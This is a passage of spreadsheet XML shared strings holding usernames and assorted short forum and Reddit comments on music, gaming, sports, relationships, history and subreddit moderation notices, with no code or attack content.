    <t>Darksage Дата: Понедельник, 20.02.2017, 07:03 Demigod - Slumber Of Sullen Eyes and Unholy Domain Year : 1992 [demo 1991] (Remastered-2006) Style : Death Metal Country : Finland Last known line-up : Esa Lindén - Vocals Tero Laitinen - Guitar Tuomas Karppinen - Guitar (Archgoat, Torture Killer, Torn (Fin), Torsofuck, Cadaveric Incubator) Sami Vesanto - Bass Tuomo Latvala - Drums (AN, Deepred, Hellbox, Torn (Fin), Torture Killer, Torsofuck, Hateform) Tracklist : 1. Apocryphal (Intro) 00:22 2. As I Behold I Despise 04:38 3. Dead Soul 03:43 4. The Forlorn 04:04 5. Tears f God 05:14 6. Slumber Of Sullen Eyes 05:58 7. Embrace The Darkness/Blood Of The Perished 05:04 8. Fear Obscures From Within 04:17 9. Transmigration Beyond Eternities 04:29 10. Towards The Shrouded Infinity 03:39 11. Perpetual Ascent 03:45 12. Darkened (Bonus Track) 02:48 Total playing time 45:46 Unholy Domain (Demo 1991): 13. Perpetual Ascent (Intro) 03:12 14. Anxiety 04:31 15. Reincarnation 04:18 16. Succumb To Dark 03:57 Слушайте Slumber of Sullen Eyes — Demigod на Яндекс.Музыке</t>
  </si>
  <si>
    <t>ladystetson</t>
  </si>
  <si>
    <t>&gt;The first "asshole" move I probably made was springing this discussion on them so suddenly. Two days after the last bite if there dog bit someone, then there needed to be a discussion. they should be glad no one pressed charges against their dog. NTA a clear requirement of being a dog owner tenant is that it can't bite other tenants. that should have been obvious to them. has nothing to do with you.</t>
  </si>
  <si>
    <t>Lazylion2</t>
  </si>
  <si>
    <t>god damn the debates here are top notch</t>
  </si>
  <si>
    <t>Do you have an interesting movie concept and are curious to discuss its potential box office prospects, or have any other theoretical questions? This is your place. A new thread is created automatically each week.</t>
  </si>
  <si>
    <t>BluAnimal</t>
  </si>
  <si>
    <t>Completely forgot about that show, time to restart it.</t>
  </si>
  <si>
    <t>hinktech</t>
  </si>
  <si>
    <t>The tuning buttons seem to work great but a few of the posts the string wraps around are slightly loose in the headstock. Everything online says I can use a wrench but they seem perfectly round and I can’t figure out how to tighten them. I’d be grateful for any help. [here’s a view of the back of the tunners as well.](https://imgur.com/a/sU5Cazu)</t>
  </si>
  <si>
    <t>NewAgeDerpDerp</t>
  </si>
  <si>
    <t>(The abbreviation for not the asshole is NTA)</t>
  </si>
  <si>
    <t>Shuai_Nerd</t>
  </si>
  <si>
    <t>[https://i.imgur.com/JKyU8nz.jpg](https://i.imgur.com/JKyU8nz.jpg)</t>
  </si>
  <si>
    <t>nlothanks</t>
  </si>
  <si>
    <t>Do your thighs rub together? I have never had a problem with pants wearing out there.</t>
  </si>
  <si>
    <t>buffalojohnson22322</t>
  </si>
  <si>
    <t>ESH. You're totally in your rights not to want to pay to see someone else, and the office should have called you to tell you Joe wasn't in, or at the very least they should have offered you a discounted rate with Stacy since you're a long-time client with a specific masseuse (and then not fought back when you declined the first time). BUT you could have just told them that you have been having appointments with Joe for a long time and he knows what you like so you'd rather reschedule to see him. There's a glass half full and a glass half empty way to frame this situation: half full is where you say you'd like to see Joe because you're so happy with him, half empty is where you make it about how you don't trust nor want Stacy. Then on top of that, you turned it into a statement about how it's because she's a woman. You just kept putting more and more feet in your mouth here, like a poor little octopus.</t>
  </si>
  <si>
    <t>WicKKan</t>
  </si>
  <si>
    <t>The CPUs are evolving.</t>
  </si>
  <si>
    <t>Koert1984</t>
  </si>
  <si>
    <t>Ill take the sb decenium</t>
  </si>
  <si>
    <t>figjuice</t>
  </si>
  <si>
    <t>I like places like cafe 63 due to the cheap options and was wondering what other cheap food is out there other than the basic fast food joints? I am over spending so much on a fancy cafe instagram breakfast, im not interested in that stuff. I know "food tube" does $5-9 dollar burgers in greenslopes but haven't been (looks kinda dodge) just stuff like that, hidden gems haha. thank you!</t>
  </si>
  <si>
    <t>AoxomoxoAJones</t>
  </si>
  <si>
    <t>He's fine and in good health</t>
  </si>
  <si>
    <t>VladtheMemer</t>
  </si>
  <si>
    <t>That would actually be fucking awesome</t>
  </si>
  <si>
    <t>Standoc</t>
  </si>
  <si>
    <t>Uther not Tirion</t>
  </si>
  <si>
    <t>Hazy_Grow</t>
  </si>
  <si>
    <t>No, my climate frequently gets to around 10-15% humidity so I’m always running a humidifier.</t>
  </si>
  <si>
    <t>PcPerson1</t>
  </si>
  <si>
    <t>1 minute ago, King Spartan said: u mean cpu being the bottleneck or the gpu??? Well, the ryzen 3rd gen processors seem extremely powerful compared to my little old 1050ti. I don't know.</t>
  </si>
  <si>
    <t>is it worth running this on an SSD? Might do it purely for land rush day</t>
  </si>
  <si>
    <t>pvtmiller12</t>
  </si>
  <si>
    <t>Has anyone had this happen? I am rank 55, but cant prestige. I no longer gain xp from matches, but it tells me i need over 1000 more to get full rank 55. I just want to hit 6th prestige before im done with the game I stuck with it through everything, and I cant even have this. Anyone know how to fix this? Ive tried restarting multiple times.</t>
  </si>
  <si>
    <t>Aewendil</t>
  </si>
  <si>
    <t>Rotsta: Healing dungeons was always my favorite part of the game. It was always the focus of my game play. I know you’re wrong. You’re either a liar or clueless. The reason I quit retail is because the 5 man runs got so easy they were boring. How would you know? Your retail character has not completed a single M+ dungeon this expansion. Imagine quitting for the lack of challenge without even trying the challenging content first?</t>
  </si>
  <si>
    <t>brokeinOC</t>
  </si>
  <si>
    <t>A barber at the barbershop I go to parks his motorcycle ON the sidewalk completely blocking it. The worst part is there is plenty of parking on the street right in front of the shop. And every time someone scoots past it and touches it he freaks out</t>
  </si>
  <si>
    <t>Captain_Crouton_X1</t>
  </si>
  <si>
    <t>Thank god for ornaments</t>
  </si>
  <si>
    <t>cbmuser</t>
  </si>
  <si>
    <t>Every distribution can be installed “the Arch Linux way”. Arch is not doing anything special in this regard. In fact, all they did is stopped maintaining their installer meaning people were now forced to install Arch manually without the help of an installer.</t>
  </si>
  <si>
    <t>ooololoolll</t>
  </si>
  <si>
    <t>So why would it be a problem in China? Again why China?</t>
  </si>
  <si>
    <t>garnteller</t>
  </si>
  <si>
    <t>Sorry, u/cholgerson34 – your comment has been removed for breaking Rule 1: &gt; **Direct responses to a CMV post must challenge at least one aspect of OP’s stated view (however minor), or ask a clarifying question**. Arguments in favor of the view OP is willing to change must be restricted to replies to other comments. [See the wiki page for more information](http://www.reddit.com/r/changemyview/wiki/rules#wiki_rule_1). If you would like to appeal, [**you must first check if your comment falls into the "Top level comments that are against rule 1" list**](https://www.reddit.com/r/changemyview/wiki/rules#wiki_rule_1), review our appeals process [here](https://www.reddit.com/r/changemyview/wiki/modstandards#wiki_appeal_process), then [message the moderators by clicking this link](http://www.reddit.com/message/compose?to=%2Fr%2Fchangemyview⊂ject=Rule+1+Appeal+cholgerson34&amp;message=cholgerson34+would+like+to+appeal+the+removal+of+[his/her+post](https://www.reddit.com/r/changemyview/comments/ddre24/-/f2po6qo/\)+because...) within one week of this notice being posted. Please note that multiple violations will lead to a ban, as explained in our [moderation standards](https://www.reddit.com/r/changemyview/wiki/modstandards). Do not reply to this comment by clicking the reply button, instead message the moderators ..... responses to moderation notices in the thread may be removed without notice.</t>
  </si>
  <si>
    <t>ICallItFutile</t>
  </si>
  <si>
    <t>A disgruntled Browns fan in my league who drafted way too many Browns players wants to get rid of Odell as he’s scrambles to put a reasonable team together with the Browns on Bye. He also has Chubb and Seals-Jones. He is interested in my Russell Wilson and Evans. I’m only able to trade my players on Bye this week, which are Samuel, Juju, Evans and OJ Howard. Is there any (relatively) fair deal you can think of?</t>
  </si>
  <si>
    <t>janopkp</t>
  </si>
  <si>
    <t>I would love to have that job. Just call in and have ridiculous takes.</t>
  </si>
  <si>
    <t>anthony324475</t>
  </si>
  <si>
    <t>Likewise, I apologize for the beat down in Cookeville this past weekend.</t>
  </si>
  <si>
    <t>Friendly reminder that all **top level** comments must: 1. be unbiased, 2. attempt to answer the question, and 3. start with "answer:" (or "question:" if you have an on-topic follow up question to ask) Please review Rule 4 and this post before making a top level comment: http://redd.it/b1hct4/ *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/OutOfTheLoop) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>sp00k3yac710n</t>
  </si>
  <si>
    <t>I always thought it was strange that the physicist in s3e1 was giving that tour of WTP at like 11:30pm on a Friday night</t>
  </si>
  <si>
    <t>Snorlax36</t>
  </si>
  <si>
    <t>That means that we’d have to drop two sec games and one better not be Mizzou, Carolina or Vandy</t>
  </si>
  <si>
    <t>lafillex2</t>
  </si>
  <si>
    <t>Usually that’s what we do too! But every so often I start to wonder if maybe adding something else could make it more exciting. I am just stuck in a rut right now and looking for a way to make things exciting again :/</t>
  </si>
  <si>
    <t>BlahPow</t>
  </si>
  <si>
    <t>We've literally played our third string QB the last three weeks...</t>
  </si>
  <si>
    <t>stella-comm</t>
  </si>
  <si>
    <t>Hello, I have been replying to buyers messages this morning, i got through about 20 messages until i realised none had sent, i have logged it with Ebay technical team who are looking into this, i have no idea how long this will take to get fixed, but messages are mounting up now - Any one else had this issue recently?</t>
  </si>
  <si>
    <t>tepcog</t>
  </si>
  <si>
    <t>![img](k6iwyv9p0yp31 "Simple unassuming exterior") ![img](bdi3edvr0yp31 "Ticket booths") ![img](2vkkpykv0yp31 "The Lobby") ![img](cso0dssw0yp31 "Looking at the Theater Entrance") ![img](4kh1ocjz0yp31 "The Theater") ![img](ojpwkln11yp31 "From the Stage") Opening on June 4, 1930, the Pantages Theatre can hold claim to two “lasts”: the last movie palace to be built in Hollywood and the last venue erected by vaudeville circuit owner, Alexander Pantages. Designed by B. Marcus Priteca at the epitome of the Art Deco era, from sidewalk to stage, the Pantages dazzles theater-goers with chevrons, zigzags, starbrusts, and exotic figures. The 2,691-seat theatre (originally seating 2,812) features a lavish, forecourt whose ceiling’s gold, silver, and bronze-colored starbursts radiate in multiple, geometric patterns. In the lobby, two grand, carpeted staircases rise to either side below massive, Art Deco-styled chandeliers. The starburst ceiling pattern is repeated within the auditorium, but on a far grander style, backlit with deep blue hues that add further depth and dimension to its scale. The theatre, stage, and backstage areas were designed to accommodate lavish vaudeville performances as well as films, but as the depression wore on, the live stage acts proved too expensive and the theatre, with occasional exceptions, became an all-movie venue. By 1932, financial strains – and a very high-profile personal scandal – forced Pantages to sell his theatre to Fox. Then in 1949, RKO owner Howard Hughes purchased the theatre, moving his private offices into its second floor. It was during his ownership that the Pantages hosted the Academy Awards for an eleven year run (1950 – 1960), including the first telecast of the ceremony (1953). Pacific Theatres purchased the theatre in 1965, covering many of the art deco decoeative elements with curtains and dropped ceilings. In 1977, the theatre shifted to live stage productions exclusively. In 2000, the theater underwent a massive rehabilitation project, uncovering its Art Deco grandeur, receiving a Conservancy Preservation Award in 2001. [Link](https://www.laconservancy.org/locations/pantages-theatre)</t>
  </si>
  <si>
    <t>Zowayix</t>
  </si>
  <si>
    <t>Plat increased it from 151 to 210.</t>
  </si>
  <si>
    <t>JaskoGomad</t>
  </si>
  <si>
    <t>I have several still waiting to deliver! I suspect mine is going to be A Rasp of Sand.</t>
  </si>
  <si>
    <t>watawep</t>
  </si>
  <si>
    <t>I wanted to move to europe because of beautiful girls, and wonderful places :D</t>
  </si>
  <si>
    <t>ValeriUr</t>
  </si>
  <si>
    <t>I know there is a contingent that has a burning need to apply a strict "Hero's Journey" monomyth style to every narrative and I think this tendency leads to the accusation that anything that doesn't map against the "Campbell ideal" is not "good story telling." I think that's a critical error in your analysis above and one reason there is so much formulaic nonsense on offer today. I'd like to look closer at your big three "mistakes": &gt;The villain is defeated by someone other than the main character. Return of the Jedi has Vader killing the Emperor, not Luke. George Harvey, as chilling a villain as I can remember, slips on ice and falls to his death without outside assistance in The Lovely Bones. Saron/the Ring are not destroyed by Frodo, but rather by Gollum in Return of the King. René Belloq and the Nazis are destroyed by the power of the Arc of the Covenant, not Indiana Jones in the Raiders of the Lost Ark. Francis "Frank" Costello is killed by his protege Colin Sullivan, not by William "Billy" Costigan, the hero of The Departed. Also, the hero is killed in the end by an almost entirely random minor character (Trooper Barrigan). I had nightmares about Javier Bardem as Anton Chigurh in No Country for Old Men. Not only does he survive at the end but doesn't even have the good narrative grace to kill the hero Llewelyn Moss (played by Josh Brolin). Instead, Moss is killed by a more-or-less random cartel hit-squad, none of whom we have seen before. In fact, on this point, do we even need to endure the almost trite "protagonist kills the villian at the end" trope? I think not. Consider: Butch Cassidy and the Sundance Kid are killed by the Bolivian Army, not "Lord Baltimore", Joe Lefors, or head of the Union Pacific railroad E. H. Harriman. Armand d'Hubert spares Gabriel Feraud after nearly 30 years of conflict between the two in The Duellists. The list goes on. Ok, what about: &gt;The main villain is replaced midway by another villain. Virgil "The Turk" Sollozzo is replaced by Don Emilio Barzini about halfway through The Godfather (and Barzini is then replaced by all the "Five Families" as the villain in the last act). Julian Marty is killed and supplanted as the villain by Lorren Visser in Act II of Blood Simple. The list goes on there too. Then there's this: &gt;You prevent the audience from rooting for the main character by turning him into a villain. Here again, I must differ with you. Great anti-hero stories are some of the most entertaining in my view. They are far more complex and rich when done properly than the basic Campbell schlock. The transformation from hero to villain is dramatic and engaging when done properly. Great anti-hero stories: The English Patient The Godfather No Country for Old Men Breaking Bad Better Call Saul Don't fall into the lazy trap of formula.</t>
  </si>
  <si>
    <t>austinthegr8</t>
  </si>
  <si>
    <t>So tempting.... I’m about to be 6-0 barring 37 points from his Rodgers and MJJ, that playoff schedule is too nice....</t>
  </si>
  <si>
    <t>gobraves72</t>
  </si>
  <si>
    <t>25 and they’ve already come on for me</t>
  </si>
  <si>
    <t>Ziggy Stardust</t>
  </si>
  <si>
    <t>LD29 said: ↑ He was a one hit wonder. Because he played one good season, finnish posters on HF board hyped him like he was a three headed Crosby. Carolina made the mistake to pay him big time. He is not worth the money and never will be. I honestly think they should trade him as long as some other GMs think he only had a slow start. I will give anyone that Quote: s this after the season ends a free beer if Aho will have more than 20 points at the end of the season. I would even bet on Haula having more goals than Aho has points at the end of the season. Haula deserves his 1C spot. Or at least make Staal 1C and Haula 2C. And no, this is no trolling. I'm absolutely honest about it. Click to expand... Are you related to Haula?</t>
  </si>
  <si>
    <t>They were very professional, always available and made the process as smooth as it could be.</t>
  </si>
  <si>
    <t>brevit</t>
  </si>
  <si>
    <t>Ugh I miss him from the News Quiz</t>
  </si>
  <si>
    <t>xLongSleeves</t>
  </si>
  <si>
    <t>I'm still new in this field, would anyone care to tell me what this is?</t>
  </si>
  <si>
    <t>watt</t>
  </si>
  <si>
    <t>There is weird problem that they have the pfandautomat inside, so there is often large queue of people trying to get some cents for the bottles they have gathered.</t>
  </si>
  <si>
    <t>abellapa</t>
  </si>
  <si>
    <t>YES,SOMEONE ELSE WHO NOTICE,i notice this shit when i completed the game on gmgow a few days ago,that isnt kratos,is someone else</t>
  </si>
  <si>
    <t>facefuel4u</t>
  </si>
  <si>
    <t>Oh forhsure thanks man</t>
  </si>
  <si>
    <t>heretohelpyoukindly</t>
  </si>
  <si>
    <t>Absolutely, but obviously that didn't happen and I sometimes think he didn't very unceremoniously. It wasn't a cutscene and it killed me inside really</t>
  </si>
  <si>
    <t>Tayloren52</t>
  </si>
  <si>
    <t>That's awesome. It makes me happy to see him literally jumping with joy</t>
  </si>
  <si>
    <t>Vapebeee</t>
  </si>
  <si>
    <t>I believe your new juice is thicker, contains more VG. Get some PG to thin it out and it should work the same as your old one. Or find a new juice that has more PG.</t>
  </si>
  <si>
    <t>MTGCardFetcher</t>
  </si>
  <si>
    <t>[Lathliss](https://img.scryfall.com/cards/normal/front/5/4/54a4c37d-5eeb-42c9-9688-c2ed0d5044cd.jpg?1562302177) - [(G)](http://gatherer.wizards.com/Pages/Card/Details.aspx?name=lathliss%2C%20dragon%20queen) [(SF)](https://scryfall.com/card/m19/149/lathliss-dragon-queen?utm_source=mtgcardfetcher) [(txt)](https://api.scryfall.com/cards/54a4c37d-5eeb-42c9-9688-c2ed0d5044cd?utm_source=mtgcardfetcher&amp;format=text) ^^^[[cardname]] ^^^or ^^^[[cardname|SET]] ^^^to ^^^call</t>
  </si>
  <si>
    <t>TopKing63</t>
  </si>
  <si>
    <t>Damn. You had to have some amszing positioning and luck for this to work. I won a game yesterday where only myself and a teammate had s single kill and the zone finished off our enemies.</t>
  </si>
  <si>
    <t>quicknded</t>
  </si>
  <si>
    <t>I remember that time that the colonies wrote that letter to the king of England and he was like "woke! What great points! I'll give them what they want!" Or that time that Mao took the fucking guns and now China *IS* the very thing they vowed to destroy. Or when the Black Panthers rolled up to the State House in California armed with chants and flowers and then Governor Reagan was like "Oh my God look what GOOD POINTS THEY HAVE!"</t>
  </si>
  <si>
    <t>Welcome to /r/AskHistorians. **Please be sure to [Read Our Rules](https://www.reddit.com/r/AskHistorians/wiki/rules) before you contribute to this community**. We thank you for your interest in this *question*, and your patience in waiting for an in-depth and comprehensive answer to be written, which takes time. Please consider **[Clicking Here for RemindMeBot](https://www.reddit.com/message/compose/?to=RemindMeBot⊂ject=Reminder&amp;message=%5Bhttps://www.reddit.com/r/AskHistorians/comments/dc89mj/how_did_aztec_warriors_capture_their_enemy_during/%5D%0A%0ARemindMe!++2+days)**, or using [these alternatives](/r/AskHistorians/comments/8p0s9b/roundtable_21_be_kindremind_the_mod_approved/). In the meantime our [Twitter](https://twitter.com/askhistorians), [Facebook](https://www.facebook.com/askhistorians/), and [Sunday Digest](https://www.reddit.com/r/AskHistorians/search?q=title%3A%22Sunday+Digest%22&amp;restrict_sr=on&amp;sort=new&amp;t=all) feature excellent content that has already been written! [Please leave feedback on this test message here.](https://www.reddit.com/r/AskHistorians/comments/btz9o5/testing_testing_123_well_be_trying_out_an/) *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/AskHistorians) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>kellytraz</t>
  </si>
  <si>
    <t>You're drawing your eyebrows on wayyyy too dark</t>
  </si>
  <si>
    <t>domin8r</t>
  </si>
  <si>
    <t>Think I've seen you ask haha. You are absolutely right.</t>
  </si>
  <si>
    <t>SirGallantus</t>
  </si>
  <si>
    <t>What? Also it’s “if you don’t know what yo get them for ***THEIR*** birthday”</t>
  </si>
  <si>
    <t>OrientOccident</t>
  </si>
  <si>
    <t>I feel like I have whiplash from a date I just went on. I met this guy online. We have a lot in common and that showed through in our convo so we made plans to get drinks on Friday. We both said we had a really good time--good conversation, good physical chemistry etc. The date lasted a long time. He wrote me the next day to ask me to go to a museum with him today. I said yes. We went and chatted a bit throughout but I was a little reserved and didn't try to touch him. I felt a bit shy. After this meeting, which was just a couple of hours, I sent a text saying I hoped he'd liked the museum, and saying that although I had a nice time I thought it would be nice if next time we meet we</t>
  </si>
  <si>
    <t>SensationalSavior</t>
  </si>
  <si>
    <t>Masturbate constantly. OP never stated the sex had to be with someone else. My left hand counts, now i'm cured.</t>
  </si>
  <si>
    <t>haaskandri</t>
  </si>
  <si>
    <t>Legion's would be : " An illusion? What are you hiding?"...!</t>
  </si>
  <si>
    <t>Doggfite</t>
  </si>
  <si>
    <t>To calculate terminal velocity for an object, we need to use the following formula: ((2×m×g)/(D×A×C))^(0.5) m: mass of the object in kg g: acceleration due to gravity in m/s^2 D: density of air in kg/m^3 A: cross sectional area of object perpendicular to direction of travel in m^2 C: drag coefficient According to [Wikipedia](https://en.m.wikipedia.org/wiki/7.62%C3%9739mm), the AK-47 fires a 7.62×39mm cartridge and the bullet weighs 7.9 g or 0.0079 kg. Gravity is 9.8 m/s^2 Air density is 1.225 kg/m^3 According to the same Wiki page, the diameter of the bullet is 7.9mm, so it's cross sectional area is 49.02 mm^2 or 4.902×10^(-5) m^2 And for drag coefficient, I spent a lot of time trying to find an estimate and the best I could find was 0.08, which is close to a "streamlined object"s value of 0.04 So if we plug in all the values: ((2×0.0079×9.8)/(1.225×0.00004902×0.08))^(0.5) (0.15484/0.000004804)^(0.5) 32231.47^(0.5) =179.53 m/s This is very slow compared to what the Wiki lists it's muzzle velocity as: 730 m/s. But, from what I could find, it's said that minimum bullet speed to piece skin is 200 feet per second, or about 61 m/s. So clearly we could pierce the skin at this speed, but could it pierce a skull? Unfortunately, after about an hour of googling I couldn't find any info for force required to pierce a skull. What we can do, however, is see how much force would result if we assumed that it did pierce the skull. Kinetic energy is half the mass multiplied by velocity squared. 0.5×0.0079×179.53^(2)=127.31 joules. And then we can calculate max impact force by dividing kinetic energy by the distance the energy dissipates over and doubling it. The thickest part of the skull can be about 7.5mm, so let's assume that is where we hit with the bullet. 2×127.31/0.0075=33950 N This would be similar to a motorcycle hitting a brick wall at 80 mph. So, best case scenario, this looks like it would absolutely obliterate your brain, however, it's very unlikely for this to occur in real life for several reasons: 1. A falling bullet will not fall point down, it will tumble, and drastically reduce terminal velocity. 2. Because of the tumbling, it is also unlikely to hit anything straight on the point, greatly reducing the pressure over the surface. 3. There is likely to be wind, or at least turbulent air, that will prevent the bullet from falling straight down, and likely land no where near the shooter.</t>
  </si>
  <si>
    <t>wildflower_0ne</t>
  </si>
  <si>
    <t>Spirits, where would you like to go on a date?</t>
  </si>
  <si>
    <t>3fsr3</t>
  </si>
  <si>
    <t>As I understand it, there is a bug risk in playing into delusions. It can make them worse for the person experiencing the delusions since they are being validated by someone they clearly trust. I'd highly recommend reaching out to a trained professional about how to best interact with someone experiencing delusions. But it's clear that you care and that goes a long way!</t>
  </si>
  <si>
    <t>pedro3131</t>
  </si>
  <si>
    <t>5.1 ip 11 earned runs, a blown save and a loss since they sent him down. Don't think he's ready to come back up yet...</t>
  </si>
  <si>
    <t>CookieCrumbl</t>
  </si>
  <si>
    <t>We dont know, he could have let the right people know ahead of time what's going to happen, and radically change the landscape of his world because of it</t>
  </si>
  <si>
    <t>Italiangoose</t>
  </si>
  <si>
    <t>Yes officer this comment right here</t>
  </si>
  <si>
    <t>LogicalDrm</t>
  </si>
  <si>
    <t>Depends on what their contract is. If there's mention about giving sponsor rights to use footage or clips on their own marketing, then that's how it goes. Remember that LMG has done ads and product overviews in the past, including the famous firetruck video which was used for marketing the item (hence why it has all the views).</t>
  </si>
  <si>
    <t>not_anakin</t>
  </si>
  <si>
    <t>Your title incites me to kill</t>
  </si>
  <si>
    <t>RRealAlcibiades</t>
  </si>
  <si>
    <t>I feel weak because everyone I know functions just fine after one night with very little sleep, some can pull all nighters. If I drop below 6ish hours of sleep though, my brain is FRIED for the entire next day. My reflexes are slower, problem solving is garbage, I can't even really exercise, I'm just fatigued all around. I think that my ATP stockpiles are naturally very low, but I don't know how to fix them without creatine, which gives me horrible digestion issues. I don't have any deficiencies, and I currently take Rhodiola Rosea, Ashwagandha, Methylphenidate (for ADHD), and a multivitamin every morning. Any tips?</t>
  </si>
  <si>
    <t>SANcapITY</t>
  </si>
  <si>
    <t>Hah one of my frat brothers did this. Not a good time.</t>
  </si>
  <si>
    <t>Bfon_</t>
  </si>
  <si>
    <t>Good to know :) thanks! Also if 92 in your name is your birth year, I’m a fellow ‘92 baby :)</t>
  </si>
  <si>
    <t>1900grs</t>
  </si>
  <si>
    <t>&gt; Is there a billing code for nurse procedures? No. My wife has worked at many hospitals in a few states as an ICU and surgical nurse. Her billing has always fallen under housekeeping.</t>
  </si>
  <si>
    <t>Snakes_Bandana</t>
  </si>
  <si>
    <t>Yeah or Till. Probably loser of Pettis/Diaz though, the winner will fight up i think.</t>
  </si>
  <si>
    <t>Chris-P</t>
  </si>
  <si>
    <t>TIL people in Bangladesh say “shite”</t>
  </si>
  <si>
    <t>Aoife</t>
  </si>
  <si>
    <t>It\u2019s awesome , so handy and saves the whole bucket and changing the water ect</t>
  </si>
  <si>
    <t>@elihaziza</t>
  </si>
  <si>
    <t>me too @elihaziza wrote: im having the same problem, did you managed to fix it? @elihaziza wrote: im having the same problem, did you managed to fix it? me too @elihaziza wrote: im having the same problem, did you managed to fix it?</t>
  </si>
  <si>
    <t>Hello /u/suzeycue and thank you for your submission! Unfortunately it has been removed for the following reason: &gt;Posts about medical, hygiene, and toiletry related tips are no longer allowed, as they have been placed on our Restricted Topic list, which can be found in the [sidebar](/r/LifeProTips/about/sidebar). Please make sure to read through the sidebar before submitting in the future. Thanks for thinking of us, though! Have an excellent day. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/LifeProTips) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>galtsconditioning</t>
  </si>
  <si>
    <t>Just be sad. Nothing will truly fill that void. Maybe watch the movie if you haven't. The sondtrack maybe . 60+ songs. Pure heaven. It's a close 2nd</t>
  </si>
  <si>
    <t>hail destroyer</t>
  </si>
  <si>
    <t>Seems like a lot of work to put lighter duty components in your truck. Overdrive will be nice to have though. Nice fab work.</t>
  </si>
  <si>
    <t>johndelvec3</t>
  </si>
  <si>
    <t>I’ve been seeing people saying that for 3 years (since I joined the subreddit) I think when Nova eventually gets announced this subreddit will explode</t>
  </si>
  <si>
    <t>sedition-</t>
  </si>
  <si>
    <t>The average person literally does not care enough to check facts, you're lucky if they stick around to read the entire article headline, I mean most people on reddit don't even read the article when clicking on a post, they go right to the comments and find their info there.</t>
  </si>
  <si>
    <t>RyoukoOtonashi</t>
  </si>
  <si>
    <t>How long has it been since America actually got to vote someone back in? BB13 with the Brendon thing? I'd be for it</t>
  </si>
  <si>
    <t>AccountNumber166</t>
  </si>
  <si>
    <t>It's amazing how many videos I've seen of a tire coming off of a vehicle and hitting someone on a motorcycle.</t>
  </si>
  <si>
    <t>grinnbaer</t>
  </si>
  <si>
    <t>Thanks! I'll check it out!</t>
  </si>
  <si>
    <t>SMKETRMetalWorks</t>
  </si>
  <si>
    <t>Nice 4 gas. We use the same ones.</t>
  </si>
  <si>
    <t>TechnocraticAlleyCat</t>
  </si>
  <si>
    <t>yeah it's a poor query.</t>
  </si>
  <si>
    <t>Needlesstosa</t>
  </si>
  <si>
    <t>I live in Kansas City too and I feel the same way. I was nervous to walk into the store to buy my toddler a fucking Elmo toy yesterday. Went to the bar last night and consoled a woman who lost their cousin in one of the many Kansas City murders this weekend. What the fuck is happening and WHY?!</t>
  </si>
  <si>
    <t>shahzad-154</t>
  </si>
  <si>
    <t>I am using Infoshere Streams DirectoryScan operator to read files from a directory and using moveToDirectory param to archive them. I need to archive these files date-wise thus the requirement is to move files to a directory having name as current date (yyyymmdd pattern). Is this possible to achieve using DS operator, otherwise what may be the workarounds to do this? I am using Infoshere Streams DirectoryScan operator to read files from a directory and using moveToDirectory param to archive them. I need to archive these files date-wise thus the requirement is to move files to a directory having name as current date (yyyymmdd pattern). Is this possible to achieve using DS operator, otherwise what may be the workarounds to do this?</t>
  </si>
  <si>
    <t>Realniggafasho</t>
  </si>
  <si>
    <t>Thought maybe they were floating it at 55 back then. Who is Conor talking about in the video then? He mentions Nate</t>
  </si>
  <si>
    <t>jmotivator</t>
  </si>
  <si>
    <t>Originally Posted by Hatuey There seem to be pictures of Muslims dancing in Palestine in 2001, none in NJ in 2001. Weird how that happens? I'm not the one claiming that pictures are needed for something to be true. Eye witnesses that mutually corroborate the story are enough.</t>
  </si>
  <si>
    <t>HollowTalk</t>
  </si>
  <si>
    <t>Don't ruin a lovely wedding with an uncomfortable stay. Stick to your guns and book the hotel</t>
  </si>
  <si>
    <t>satans_paperclip</t>
  </si>
  <si>
    <t>YTA for the way you confronted her. If you've had this issue for a long time and you knew that she would bring something you had every opportunity to ask her to contribute drinks beforehand. Instead you waited until the actual party and made what could have been an easy situation a difficult one.</t>
  </si>
  <si>
    <t>willia02</t>
  </si>
  <si>
    <t>It's time for kelas besarrrrr\~\~\~ ^(500 mahasiswa)</t>
  </si>
  <si>
    <t>shadowbishop_84</t>
  </si>
  <si>
    <t>The struggle is real. I play on Xbox, I just like checking out people's rivens and Reddit, but my sobek riven is currently sitting at 37 rolls and I'm beginning to think it is cursed. It has never once rolled status chance. Not once. Nor has it given me ANYTHING even remotely fun to try out while I'm fattening it with kuva to become perfect. Right now my sobek is running primed damage, multi shot, scattering, acid shells, radiation and viral 100% status, has nice interplay with my condition overload melee, does sufficient arbitration level damage. But like you I want that perfect riven to make the sobek really shine.</t>
  </si>
  <si>
    <t>progrockabuse</t>
  </si>
  <si>
    <t>welcome and greetings</t>
  </si>
  <si>
    <t>Jackyhuang13</t>
  </si>
  <si>
    <t>How to do number 6,7,8,9 I have no clue how to do these cube problems</t>
  </si>
  <si>
    <t>Commander_Odin</t>
  </si>
  <si>
    <t>Ah I see the problem You are under the impression that I was asking how to make 3x4k monitors work for gaming when in reality I was wondering why it doesnt work and what was the science behind it. I get it. It's similar but not the same question It ok man. It happens.</t>
  </si>
  <si>
    <t>Rain_06-04-17</t>
  </si>
  <si>
    <t>Thank you. It’s definitely worth it not to drink. You are definitely not alone. Let’s look forward to the good days. They will come, we just have to get through the valley first.</t>
  </si>
  <si>
    <t>LatvianLion</t>
  </si>
  <si>
    <t>If this is the hill Poles are willing to die on, then - what can I say - go be happy with your homophobic Russian compatriots.</t>
  </si>
  <si>
    <t>Spredde</t>
  </si>
  <si>
    <t>And I don't really understand why Agenda.ge would put that paragraph in there. They can be implying that some other tribe did come to Abkhazia and assimilated with the Abkhazians.</t>
  </si>
  <si>
    <t>glibby-glob-glob</t>
  </si>
  <si>
    <t>The only reason i don’t upvote every post is because I’m stupid and I forget to. Yeah srry</t>
  </si>
  <si>
    <t>pieman3141</t>
  </si>
  <si>
    <t>This is the solution. I was discussing non-violence with someone, and of course the ol' "what are you gonna do about Hitler" question came up. The solution to Hitler is to literally prevent the material conditions that allowed Hitler to rise, and there was a minimum of a decade to do so, possibly even more if 1919 didn't go to shit.</t>
  </si>
  <si>
    <t>Dakar-A</t>
  </si>
  <si>
    <t>And Parquet Courts too.</t>
  </si>
  <si>
    <t>MichaelR1234004</t>
  </si>
  <si>
    <t>It’s so they won’t get stale as easy</t>
  </si>
  <si>
